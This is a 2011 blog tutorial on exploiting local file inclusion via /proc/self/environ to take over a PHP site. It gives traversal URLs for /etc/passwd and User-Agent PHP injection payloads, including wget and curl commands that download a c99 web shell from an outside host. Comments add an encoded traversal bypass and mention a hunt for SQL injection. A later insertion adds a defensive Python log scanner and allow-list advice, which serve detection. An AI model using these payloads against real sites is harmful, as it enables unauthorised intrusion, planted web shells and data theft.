Sunday, December 4, 2011

EXPLOITING LFI VULNERABILITIES via /PROC/SELF/ENVIRON

I previously covered how to exploit LFI vulnerabilities with FIMAP but have received some questions from folks because FIMAP does not always pick the injection points up. Automated tools are nice, but if you don't know how to do it manually you can miss a lot of possible vulnerabilities and opportunities you could leverage to exploit your target (plus it's good to know what goes on behind the scenes). Today I am going to show you how to perform LFI exploitation through the /proc/self/environ method. Here goes…

OK, so first we walk through our site and we notice a link which seems to be referencing another document on the server. This is a good place to start investigating potential LFI vulnerabilities.

We click on "Contact Us", which leads us to...

NOTE: page= appears to reference another document on the server (in this case contacts.php).

Let us see what happens if we replace the standard link with some arbitrary data:

http://www.site.com/index.php?page=1

Now let us try to reference a real document which we know to be on all Unix machines, /etc/passwd:


Voila! We can read the /etc/passwd file through LFI! This is good, but now we need to check whether /proc/self/environ is accessible. If it is, we can leverage it to get a shell on the target site. If it is not, we will need to further investigate which files we can access and then see if we can inject into any of them. I will only be focusing on the /proc/self/environ method for now, but may write a follow-up in future to cover some of the other methods which can be used for LFI takeover. OK, so now we check for the existence of /proc/self/environ:

NOTE the "DOCUMENT_ROOT=[VALUE]" on the returned page. This is the key indicator that we have access to /proc/self/environ, which we can now leverage to put a shell on the target site. We will accomplish this by injecting our PHP code into the User-Agent field when we request this file again. /proc/self/environ holds the environment of the web server process that serves our request, and that environment includes our User-Agent header as HTTP_USER_AGENT; because the vulnerable script includes the file as PHP, our code is executed, and we can then use it to further escalate privileges. We will now inject this code into our page request for /proc/self/environ and refresh the page.

Inject PHP code in the UA field, like one of these:

ID: <?system('id');?>
UNAME: <?system('uname -a');?>

UPLOAD SHELL WITH WGET: <?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?>
OR
UPLOAD SHELL WITH CURL: <?system('curl -o shell.php http://www.sh3ll.org/c99.txt');?>

We can now read the results of any of the commands we pass through in the User-Agent field; it will look similar to this:

NOTE: to inject the code into the User-Agent field you will need an add-on for your browser such as Live HTTP Headers, Tamper Data, or Burp Suite.

Once our code is injected we simply navigate to the webshell we just uploaded; it should be located at site.com/shell.php unless you instructed it to go elsewhere in your WGET or CURL command for the shell download. If you're lucky, when you go to your shell you will be greeted with something similar to this:
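From the defender's side, the whole sequence above leaves a recognisable trail in the web server's access log: a page= parameter that walks up with ../ into /etc/passwd or /proc/self/environ, followed by a request whose User-Agent carries PHP tags. The script below is an added example written for this page, not code from the original post. It parses constructed Apache "combined" log lines (the IPs, timestamps and sizes are made up), percent-decodes the page parameter repeatedly so the ..%2f..%2fproc%2f.%2fself%2f.%2fenviron variant mentioned in the comments normalises to the same path, and tags each request with the indicators an analyst would alert on. The log format, field names and tag names are this example's own assumptions.

```python
"""Flag LFI probing and /proc/self/environ User-Agent injection in access logs.

Added example for this page, not part of the original post. All log lines,
addresses and timestamps below are constructed; the detection heuristics are
this example's own assumptions about what is worth alerting on.
"""
import posixpath
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache/nginx "combined" format (hypothetical traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Dec/2011:10:00:01 +0000] "GET /index.php?page=contacts.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Dec/2011:10:00:07 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Dec/2011:10:00:15 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Dec/2011:10:00:22 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 2300 "-" "<?system('id');?>"
203.0.113.5 - - [04/Dec/2011:10:00:40 +0000] "GET /index.php?page=..%2f..%2fproc%2f.%2fself%2f.%2fenviron HTTP/1.1" 200 2300 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Dec/2011:10:01:00 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 3900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Files the post shows being read through the include; matched after path normalisation.
SENSITIVE_RE = re.compile(r'(^|/)(etc/passwd|proc/(self|\d+)/environ)$')


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so double-encoded traversal is still visible."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line: str) -> Optional[dict]:
    """Parse one log line and return its indicators; None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m['target']).query
    page = fully_decode(parse_qs(query, keep_blank_values=True).get('page', [''])[0])
    # normpath collapses "/./" and "a/../" so ..%2f.%2fself%2f.%2f variants line up.
    normalised = posixpath.normpath(page) if page else ''
    tags = set()
    if '../' in page or '..\\' in page:
        tags.add('traversal')
    if SENSITIVE_RE.search(normalised):
        tags.add('sensitive_file')
    if '<?' in fully_decode(m['ua']):
        tags.add('php_in_user_agent')
    return {'ip': m['ip'], 'page': page, 'ua': m['ua'], 'tags': sorted(tags)}


def scan_log(text: str) -> list:
    """Return the classified entries that carry at least one indicator."""
    findings = []
    for line in text.splitlines():
        entry = classify(line)
        if entry and entry['tags']:
            findings.append(entry)
    return findings


def sequence_by_ip(findings: list) -> dict:
    """Group indicator lists per source address, preserving order, to show the chain."""
    chains = {}
    for entry in findings:
        chains.setdefault(entry['ip'], []).append(entry['tags'])
    return chains


if __name__ == '__main__':
    for entry in scan_log(SAMPLE_LOG):
        print(entry['ip'], entry['page'], entry['tags'])
    print(sequence_by_ip(scan_log(SAMPLE_LOG)))
```

In practice the per-IP chain is the useful signal: a single traversal attempt is noise, but traversal, then /proc/self/environ, then a PHP tag in the User-Agent from the same address is the exact escalation the post walks through and should page someone. The fix on the application side is not a better filter but resolving the page parameter against a fixed allow-list of includable files rather than passing it to include().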

Now that you have a shell on the site you are fairly free to do what you want. I hope you have enjoyed another brief tutorial on LFI. I will try to work on follow-up articles covering the Log Injection method and one or two more methods that can be used when the conditions are right. Until next time, enjoy!

3 comments:

  1. Replies
    1. You can try some basic bypass techniques for encoding path traversal and the actual file name, ..%2f..%2fproc%2f.%2fself%2f.%2fenviron for example, OR find another injection vector.

  2. I don't get any error. Not with passwd nor with environ.
    The content area just goes blank...

    Any suggestions? I am trying to find the hidden admin portal where a SQL injection can be performed to gain access.
